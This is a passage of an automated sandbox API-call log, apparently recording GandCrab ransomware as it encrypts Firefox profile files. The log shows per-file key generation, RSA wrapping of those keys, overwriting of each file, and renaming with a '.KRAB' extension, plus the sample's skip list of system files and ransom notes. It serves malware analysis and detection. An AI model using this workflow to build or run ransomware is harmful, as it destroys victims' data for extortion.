dwFlags=0x0, phKey=0x338dd30 | out: phKey=0x338dd30*=0xffe958) returned 1 [0079.007] CryptGetKeyParam (in: hKey=0xffe958, dwParam=0x8, pbData=0x338dd24, pdwDataLen=0x338dd28, dwFlags=0x0 | out: pbData=0x338dd24*=0x800, pdwDataLen=0x338dd28*=0x4) returned 1 [0079.008] CryptEncrypt (in: hKey=0xffe958, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x3010000*, pdwDataLen=0x338dd5c*=0xc8, dwBufLen=0x100 | out: pbData=0x3010000*, pdwDataLen=0x338dd5c*=0x100) returned 1 [0079.008] GetLastError () returned 0x0 [0079.008] CryptDestroyKey (hKey=0xffe958) returned 1 [0079.008] CryptReleaseContext (hProv=0x1010ac8, dwFlags=0x0) returned 1 [0079.008] CryptAcquireContextW (in: phProv=0x338dd2c, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338dd2c*=0x10111b0) returned 1 [0079.009] CryptImportKey (in: hProv=0x10111b0, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338dd30 | out: phKey=0x338dd30*=0xffe498) returned 1 [0079.009] CryptGetKeyParam (in: hKey=0xffe498, dwParam=0x8, pbData=0x338dd24, pdwDataLen=0x338dd28, dwFlags=0x0 | out: pbData=0x338dd24*=0x800, pdwDataLen=0x338dd28*=0x4) returned 1 [0079.010] CryptEncrypt (in: hKey=0xffe498, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x3010100*, pdwDataLen=0x338dd5c*=0xc8, dwBufLen=0x100 | out: pbData=0x3010100*, pdwDataLen=0x338dd5c*=0x100) returned 1 [0079.010] GetLastError () returned 0x0 [0079.010] CryptDestroyKey (hKey=0xffe498) returned 1 [0079.010] CryptReleaseContext (hProv=0x10111b0, dwFlags=0x0) returned 1 [0079.010] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\datareporting\\archived\\2017-05\\1495592289365.f6bd7dec-4421-47ce-b829-1080689ec7ca.main.jsonlz4" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\mozilla\\firefox\\profiles\\8i341t8m.default\\datareporting\\archived\\2017-05\\1495592289365.f6bd7dec-4421-47ce-b829-1080689ec7ca.main.jsonlz4"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x7e4 [0079.052] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x3870000 [0079.053] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x3b80000 [0079.053] ReadFile (in: hFile=0x7e4, lpBuffer=0x3870000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338ddfc, lpOverlapped=0x0 | out: lpBuffer=0x3870000*, lpNumberOfBytesRead=0x338ddfc*=0x137c, lpOverlapped=0x0) returned 1 [0079.133] SetFilePointerEx (in: hFile=0x7e4, liDistanceToMove=0xffffec84, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0079.133] WriteFile (in: hFile=0x7e4, lpBuffer=0x3b80000*, nNumberOfBytesToWrite=0x137c, lpNumberOfBytesWritten=0x338ddf8, lpOverlapped=0x0 | out: lpBuffer=0x3b80000*, lpNumberOfBytesWritten=0x338ddf8*=0x137c, lpOverlapped=0x0) returned 1 [0079.133] WriteFile (in: hFile=0x7e4, lpBuffer=0x3010000*, nNumberOfBytesToWrite=0x208, lpNumberOfBytesWritten=0x338ddf8, lpOverlapped=0x0 | out: lpBuffer=0x3010000*, lpNumberOfBytesWritten=0x338ddf8*=0x208, lpOverlapped=0x0) returned 1 [0079.133] VirtualFree (lpAddress=0x3870000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0079.138] VirtualFree (lpAddress=0x3b80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0079.153] CloseHandle (hObject=0x7e4) returned 1 [0079.157] VirtualFree (lpAddress=0x3010000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0079.158] MoveFileW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\datareporting\\archived\\2017-05\\1495592289365.f6bd7dec-4421-47ce-b829-1080689ec7ca.main.jsonlz4" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\mozilla\\firefox\\profiles\\8i341t8m.default\\datareporting\\archived\\2017-05\\1495592289365.f6bd7dec-4421-47ce-b829-1080689ec7ca.main.jsonlz4"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\datareporting\\archived\\2017-05\\1495592289365.f6bd7dec-4421-47ce-b829-1080689ec7ca.main.jsonlz4.KRAB" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\mozilla\\firefox\\profiles\\8i341t8m.default\\datareporting\\archived\\2017-05\\1495592289365.f6bd7dec-4421-47ce-b829-1080689ec7ca.main.jsonlz4.krab")) returned 1 [0079.159] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0079.159] FindNextFileW (in: hFindFile=0xffe758, lpFindFileData=0x338de50 | out: lpFindFileData=0x338de50) returned 1 [0079.159] lstrcmpW (lpString1="1495596278120.31e5ce24-c2bf-486b-b29e-534113b7c6dc.main.jsonlz4", lpString2=".") returned 1 [0079.159] lstrcmpW (lpString1="1495596278120.31e5ce24-c2bf-486b-b29e-534113b7c6dc.main.jsonlz4", lpString2="..") returned 1 [0079.159] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\datareporting\\archived\\2017-05\\", lpString2="1495596278120.31e5ce24-c2bf-486b-b29e-534113b7c6dc.main.jsonlz4" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\datareporting\\archived\\2017-05\\1495596278120.31e5ce24-c2bf-486b-b29e-534113b7c6dc.main.jsonlz4") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\datareporting\\archived\\2017-05\\1495596278120.31e5ce24-c2bf-486b-b29e-534113b7c6dc.main.jsonlz4" [0079.159] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0079.160] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\datareporting\\archived\\2017-05\\1495596278120.31e5ce24-c2bf-486b-b29e-534113b7c6dc.main.jsonlz4.KRAB") returned 179 [0079.160] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\datareporting\\archived\\2017-05\\1495596278120.31e5ce24-c2bf-486b-b29e-534113b7c6dc.main.jsonlz4") returned 174 [0079.160] lstrlenW (lpString=".jsonlz4") returned 8 [0079.160] VirtualAlloc (lpAddress=0x0, dwSize=0x14, flAllocationType=0x3000, flProtect=0x4) returned 0x3010000 [0079.160] wsprintfW (in: param_1=0x3010000, param_2="%s " | out: param_1=".jsonlz4 ") returned 9 [0079.160] VirtualFree (lpAddress=0x3010000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0079.161] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\datareporting\\archived\\2017-05\\1495596278120.31e5ce24-c2bf-486b-b29e-534113b7c6dc.main.jsonlz4") returned 174 [0079.161] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\datareporting\\archived\\2017-05\\1495596278120.31e5ce24-c2bf-486b-b29e-534113b7c6dc.main.jsonlz4") returned 174 [0079.161] lstrcmpiW (lpString1="1495596278120.31e5ce24-c2bf-486b-b29e-534113b7c6dc.main.jsonlz4", lpString2="desktop.ini") returned -1 [0079.161] lstrcmpiW (lpString1="1495596278120.31e5ce24-c2bf-486b-b29e-534113b7c6dc.main.jsonlz4", lpString2="autorun.inf") returned -1 [0079.161] lstrcmpiW (lpString1="1495596278120.31e5ce24-c2bf-486b-b29e-534113b7c6dc.main.jsonlz4", lpString2="ntuser.dat") returned -1 [0079.161] lstrcmpiW (lpString1="1495596278120.31e5ce24-c2bf-486b-b29e-534113b7c6dc.main.jsonlz4", lpString2="iconcache.db") returned -1 [0079.161] lstrcmpiW (lpString1="1495596278120.31e5ce24-c2bf-486b-b29e-534113b7c6dc.main.jsonlz4", lpString2="bootsect.bak") returned -1 [0079.161] lstrcmpiW (lpString1="1495596278120.31e5ce24-c2bf-486b-b29e-534113b7c6dc.main.jsonlz4", lpString2="boot.ini") returned -1 [0079.161] lstrcmpiW (lpString1="1495596278120.31e5ce24-c2bf-486b-b29e-534113b7c6dc.main.jsonlz4", lpString2="ntuser.dat.log") returned -1 [0079.161] lstrcmpiW (lpString1="1495596278120.31e5ce24-c2bf-486b-b29e-534113b7c6dc.main.jsonlz4", lpString2="thumbs.db") returned -1 [0079.161] lstrcmpiW (lpString1="1495596278120.31e5ce24-c2bf-486b-b29e-534113b7c6dc.main.jsonlz4", lpString2="KRAB-DECRYPT.html") returned -1 [0079.161] lstrcmpiW (lpString1="1495596278120.31e5ce24-c2bf-486b-b29e-534113b7c6dc.main.jsonlz4", lpString2="KRAB-DECRYPT.txt") returned -1 [0079.161] lstrcmpiW (lpString1="1495596278120.31e5ce24-c2bf-486b-b29e-534113b7c6dc.main.jsonlz4", lpString2="CRAB-DECRYPT.txt") returned -1 [0079.161] lstrcmpiW (lpString1="1495596278120.31e5ce24-c2bf-486b-b29e-534113b7c6dc.main.jsonlz4", lpString2="ntldr") returned -1 [0079.161] lstrcmpiW (lpString1="1495596278120.31e5ce24-c2bf-486b-b29e-534113b7c6dc.main.jsonlz4", lpString2="NTDETECT.COM") returned -1 [0079.161] lstrcmpiW (lpString1="1495596278120.31e5ce24-c2bf-486b-b29e-534113b7c6dc.main.jsonlz4", lpString2="Bootfont.bin") returned -1 [0079.161] VirtualAlloc (lpAddress=0x0, dwSize=0x208, flAllocationType=0x3000, flProtect=0x4) returned 0x3010000 [0079.162] CryptAcquireContextW (in: phProv=0x338dd34, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338dd34*=0x1010df8) returned 1 [0079.163] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x3030000 [0079.164] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0079.164] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0079.164] CryptGenRandom (in: hProv=0x1010df8, dwLen=0x20, pbBuffer=0x338ddcc | out: pbBuffer=0x338ddcc) returned 1 [0079.164] CryptReleaseContext (hProv=0x1010df8, dwFlags=0x0) returned 1 [0079.164] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0079.164] CryptAcquireContextW (in: phProv=0x338dd34, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338dd34*=0x1010ac8) returned 1 [0079.166] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x3030000 [0079.166] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0079.167] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0079.167] CryptGenRandom (in: hProv=0x1010ac8, dwLen=0x8, pbBuffer=0x338ddec | out: pbBuffer=0x338ddec) returned 1 [0079.167] CryptReleaseContext (hProv=0x1010ac8, dwFlags=0x0) returned 1 [0079.167] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0079.167] CryptAcquireContextW (in: phProv=0x338dd2c, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338dd2c*=0x1010bd8) returned 1 [0079.204] CryptImportKey (in: hProv=0x1010bd8, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338dd30 | out: phKey=0x338dd30*=0x1023038) returned 1 [0079.204] CryptGetKeyParam (in: hKey=0x1023038, dwParam=0x8, pbData=0x338dd24, pdwDataLen=0x338dd28, dwFlags=0x0 | out: pbData=0x338dd24*=0x800, pdwDataLen=0x338dd28*=0x4) returned 1 [0079.204] CryptEncrypt (in: hKey=0x1023038, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x3010000*, pdwDataLen=0x338dd5c*=0xc8, dwBufLen=0x100 | out: pbData=0x3010000*, pdwDataLen=0x338dd5c*=0x100) returned 1 [0079.205] GetLastError () returned 0x0 [0079.205] CryptDestroyKey (hKey=0x1023038) returned 1 [0079.205] CryptReleaseContext (hProv=0x1010bd8, dwFlags=0x0) returned 1 [0079.205] CryptAcquireContextW (in: phProv=0x338dd2c, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338dd2c*=0x1010bd8) returned 1 [0079.207] CryptImportKey (in: hProv=0x1010bd8, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338dd30 | out: phKey=0x338dd30*=0x1023338) returned 1 [0079.207] CryptGetKeyParam (in: hKey=0x1023338, dwParam=0x8, pbData=0x338dd24, pdwDataLen=0x338dd28, dwFlags=0x0 | out: pbData=0x338dd24*=0x800, pdwDataLen=0x338dd28*=0x4) returned 1 [0079.207] CryptEncrypt (in: hKey=0x1023338, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x3010100*, pdwDataLen=0x338dd5c*=0xc8, dwBufLen=0x100 | out: pbData=0x3010100*, pdwDataLen=0x338dd5c*=0x100) returned 1 [0079.221] GetLastError () returned 0x0 [0079.221] CryptDestroyKey (hKey=0x1023338) returned 1 [0079.222] CryptReleaseContext (hProv=0x1010bd8, dwFlags=0x0) returned 1 [0079.222] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\datareporting\\archived\\2017-05\\1495596278120.31e5ce24-c2bf-486b-b29e-534113b7c6dc.main.jsonlz4" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\mozilla\\firefox\\profiles\\8i341t8m.default\\datareporting\\archived\\2017-05\\1495596278120.31e5ce24-c2bf-486b-b29e-534113b7c6dc.main.jsonlz4"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x7e4 [0079.227] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x3870000 [0079.228] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x3b80000 [0079.228] ReadFile (in: hFile=0x7e4, lpBuffer=0x3870000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338ddfc, lpOverlapped=0x0 | out: lpBuffer=0x3870000*, lpNumberOfBytesRead=0x338ddfc*=0x1407, lpOverlapped=0x0) returned 1 [0079.277] SetFilePointerEx (in: hFile=0x7e4, liDistanceToMove=0xffffebf9, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0079.277] WriteFile (in: hFile=0x7e4, lpBuffer=0x3b80000*, nNumberOfBytesToWrite=0x1407, lpNumberOfBytesWritten=0x338ddf8, lpOverlapped=0x0 | out: lpBuffer=0x3b80000*, lpNumberOfBytesWritten=0x338ddf8*=0x1407, lpOverlapped=0x0) returned 1 [0079.278] WriteFile (in: hFile=0x7e4, lpBuffer=0x3010000*, nNumberOfBytesToWrite=0x208, lpNumberOfBytesWritten=0x338ddf8, lpOverlapped=0x0 | out: lpBuffer=0x3010000*, lpNumberOfBytesWritten=0x338ddf8*=0x208, lpOverlapped=0x0) returned 1 [0079.278] VirtualFree (lpAddress=0x3870000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0079.282] VirtualFree (lpAddress=0x3b80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0079.283] CloseHandle (hObject=0x7e4) returned 1 [0079.284] VirtualFree (lpAddress=0x3010000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0079.284] MoveFileW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\datareporting\\archived\\2017-05\\1495596278120.31e5ce24-c2bf-486b-b29e-534113b7c6dc.main.jsonlz4" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\mozilla\\firefox\\profiles\\8i341t8m.default\\datareporting\\archived\\2017-05\\1495596278120.31e5ce24-c2bf-486b-b29e-534113b7c6dc.main.jsonlz4"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\datareporting\\archived\\2017-05\\1495596278120.31e5ce24-c2bf-486b-b29e-534113b7c6dc.main.jsonlz4.KRAB" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\mozilla\\firefox\\profiles\\8i341t8m.default\\datareporting\\archived\\2017-05\\1495596278120.31e5ce24-c2bf-486b-b29e-534113b7c6dc.main.jsonlz4.krab")) returned 1 [0079.285] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0079.286] FindNextFileW (in: hFindFile=0xffe758, lpFindFileData=0x338de50 | out: lpFindFileData=0x338de50) returned 1 [0079.286] lstrcmpW (lpString1="1495597242414.2e462298-aeda-4ee5-bf23-a73bdf74947f.main.jsonlz4", lpString2=".") returned 1 [0079.286] lstrcmpW (lpString1="1495597242414.2e462298-aeda-4ee5-bf23-a73bdf74947f.main.jsonlz4", lpString2="..") returned 1 [0079.286] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\datareporting\\archived\\2017-05\\", lpString2="1495597242414.2e462298-aeda-4ee5-bf23-a73bdf74947f.main.jsonlz4" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\datareporting\\archived\\2017-05\\1495597242414.2e462298-aeda-4ee5-bf23-a73bdf74947f.main.jsonlz4") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\datareporting\\archived\\2017-05\\1495597242414.2e462298-aeda-4ee5-bf23-a73bdf74947f.main.jsonlz4" [0079.286] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0079.287] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\datareporting\\archived\\2017-05\\1495597242414.2e462298-aeda-4ee5-bf23-a73bdf74947f.main.jsonlz4.KRAB") returned 179 [0079.287] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\datareporting\\archived\\2017-05\\1495597242414.2e462298-aeda-4ee5-bf23-a73bdf74947f.main.jsonlz4") returned 174 [0079.287] lstrlenW (lpString=".jsonlz4") returned 8 [0079.287] VirtualAlloc (lpAddress=0x0, dwSize=0x14, flAllocationType=0x3000, flProtect=0x4) returned 0x3010000 [0079.287] wsprintfW (in: param_1=0x3010000, param_2="%s " | out: param_1=".jsonlz4 ") returned 9 [0079.288] VirtualFree (lpAddress=0x3010000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0079.289] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\datareporting\\archived\\2017-05\\1495597242414.2e462298-aeda-4ee5-bf23-a73bdf74947f.main.jsonlz4") returned 174 [0079.289] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\datareporting\\archived\\2017-05\\1495597242414.2e462298-aeda-4ee5-bf23-a73bdf74947f.main.jsonlz4") returned 174 [0079.289] lstrcmpiW (lpString1="1495597242414.2e462298-aeda-4ee5-bf23-a73bdf74947f.main.jsonlz4", lpString2="desktop.ini") returned -1 [0079.289] lstrcmpiW (lpString1="1495597242414.2e462298-aeda-4ee5-bf23-a73bdf74947f.main.jsonlz4", lpString2="autorun.inf") returned -1 [0079.289] lstrcmpiW (lpString1="1495597242414.2e462298-aeda-4ee5-bf23-a73bdf74947f.main.jsonlz4", lpString2="ntuser.dat") returned -1 [0079.289] lstrcmpiW (lpString1="1495597242414.2e462298-aeda-4ee5-bf23-a73bdf74947f.main.jsonlz4", lpString2="iconcache.db") returned -1 [0079.289] lstrcmpiW (lpString1="1495597242414.2e462298-aeda-4ee5-bf23-a73bdf74947f.main.jsonlz4", lpString2="bootsect.bak") returned -1 [0079.289] lstrcmpiW (lpString1="1495597242414.2e462298-aeda-4ee5-bf23-a73bdf74947f.main.jsonlz4", lpString2="boot.ini") returned -1 [0079.289] lstrcmpiW (lpString1="1495597242414.2e462298-aeda-4ee5-bf23-a73bdf74947f.main.jsonlz4", lpString2="ntuser.dat.log") returned -1 [0079.289] lstrcmpiW (lpString1="1495597242414.2e462298-aeda-4ee5-bf23-a73bdf74947f.main.jsonlz4", lpString2="thumbs.db") returned -1 [0079.290] lstrcmpiW (lpString1="1495597242414.2e462298-aeda-4ee5-bf23-a73bdf74947f.main.jsonlz4", lpString2="KRAB-DECRYPT.html") returned -1 [0079.290] lstrcmpiW (lpString1="1495597242414.2e462298-aeda-4ee5-bf23-a73bdf74947f.main.jsonlz4", lpString2="KRAB-DECRYPT.txt") returned -1 [0079.290] lstrcmpiW (lpString1="1495597242414.2e462298-aeda-4ee5-bf23-a73bdf74947f.main.jsonlz4", lpString2="CRAB-DECRYPT.txt") returned -1 [0079.290] lstrcmpiW (lpString1="1495597242414.2e462298-aeda-4ee5-bf23-a73bdf74947f.main.jsonlz4", lpString2="ntldr") returned -1 [0079.290] lstrcmpiW (lpString1="1495597242414.2e462298-aeda-4ee5-bf23-a73bdf74947f.main.jsonlz4", lpString2="NTDETECT.COM") returned -1 [0079.290] lstrcmpiW (lpString1="1495597242414.2e462298-aeda-4ee5-bf23-a73bdf74947f.main.jsonlz4", lpString2="Bootfont.bin") returned -1 [0079.290] VirtualAlloc (lpAddress=0x0, dwSize=0x208, flAllocationType=0x3000, flProtect=0x4) returned 0x3010000 [0079.290] CryptAcquireContextW (in: phProv=0x338dd34, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338dd34*=0x1010a40) returned 1 [0079.292] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x3030000 [0079.293] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0079.293] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0079.293] CryptGenRandom (in: hProv=0x1010a40, dwLen=0x20, pbBuffer=0x338ddcc | out: pbBuffer=0x338ddcc) returned 1 [0079.293] CryptReleaseContext (hProv=0x1010a40, dwFlags=0x0) returned 1 [0079.293] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0079.294] CryptAcquireContextW (in: phProv=0x338dd34, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338dd34*=0x1010d70) returned 1 [0079.298] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x3030000 [0079.299] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0079.299] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0079.299] CryptGenRandom (in: hProv=0x1010d70, dwLen=0x8, pbBuffer=0x338ddec | out: pbBuffer=0x338ddec) returned 1 [0079.299] CryptReleaseContext (hProv=0x1010d70, dwFlags=0x0) returned 1 [0079.299] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0079.299] CryptAcquireContextW (in: phProv=0x338dd2c, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338dd2c*=0x1010b50) returned 1 [0079.378] CryptImportKey (in: hProv=0x1010b50, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338dd30 | out: phKey=0x338dd30*=0x1022ff8) returned 1 [0079.378] CryptGetKeyParam (in: hKey=0x1022ff8, dwParam=0x8, pbData=0x338dd24, pdwDataLen=0x338dd28, dwFlags=0x0 | out: pbData=0x338dd24*=0x800, pdwDataLen=0x338dd28*=0x4) returned 1 [0079.378] CryptEncrypt (in: hKey=0x1022ff8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x3010000*, pdwDataLen=0x338dd5c*=0xc8, dwBufLen=0x100 | out: pbData=0x3010000*, pdwDataLen=0x338dd5c*=0x100) returned 1 [0079.379] GetLastError () returned 0x0 [0079.379] CryptDestroyKey (hKey=0x1022ff8) returned 1 [0079.379] CryptReleaseContext (hProv=0x1010b50, dwFlags=0x0) returned 1 [0079.379] CryptAcquireContextW (in: phProv=0x338dd2c, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338dd2c*=0x1011810) returned 1 [0079.380] CryptImportKey (in: hProv=0x1011810, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338dd30 | out: phKey=0x338dd30*=0x1023238) returned 1 [0079.380] CryptGetKeyParam (in: hKey=0x1023238, dwParam=0x8, pbData=0x338dd24, pdwDataLen=0x338dd28, dwFlags=0x0 | out: pbData=0x338dd24*=0x800, pdwDataLen=0x338dd28*=0x4) returned 1 [0079.380] CryptEncrypt (in: hKey=0x1023238, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x3010100*, pdwDataLen=0x338dd5c*=0xc8, dwBufLen=0x100 | out: pbData=0x3010100*, pdwDataLen=0x338dd5c*=0x100) returned 1 [0079.381] GetLastError () returned 0x0 [0079.381] CryptDestroyKey (hKey=0x1023238) returned 1 [0079.381] CryptReleaseContext (hProv=0x1011810, dwFlags=0x0) returned 1 [0079.381] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\datareporting\\archived\\2017-05\\1495597242414.2e462298-aeda-4ee5-bf23-a73bdf74947f.main.jsonlz4" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\mozilla\\firefox\\profiles\\8i341t8m.default\\datareporting\\archived\\2017-05\\1495597242414.2e462298-aeda-4ee5-bf23-a73bdf74947f.main.jsonlz4"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x7e4 [0079.432] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x3870000 [0079.432] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x3b80000 [0079.435] ReadFile (in: hFile=0x7e4, lpBuffer=0x3870000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338ddfc, lpOverlapped=0x0 | out: lpBuffer=0x3870000*, lpNumberOfBytesRead=0x338ddfc*=0x14b2, lpOverlapped=0x0) returned 1 [0079.458] SetFilePointerEx (in: hFile=0x7e4, liDistanceToMove=0xffffeb4e, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0079.459] WriteFile (in: hFile=0x7e4, lpBuffer=0x3b80000*, nNumberOfBytesToWrite=0x14b2, lpNumberOfBytesWritten=0x338ddf8, lpOverlapped=0x0 | out: lpBuffer=0x3b80000*, lpNumberOfBytesWritten=0x338ddf8*=0x14b2, lpOverlapped=0x0) returned 1 [0079.459] WriteFile (in: hFile=0x7e4, lpBuffer=0x3010000*, nNumberOfBytesToWrite=0x208, lpNumberOfBytesWritten=0x338ddf8, lpOverlapped=0x0 | out: lpBuffer=0x3010000*, lpNumberOfBytesWritten=0x338ddf8*=0x208, lpOverlapped=0x0) returned 1 [0079.459] VirtualFree (lpAddress=0x3870000, 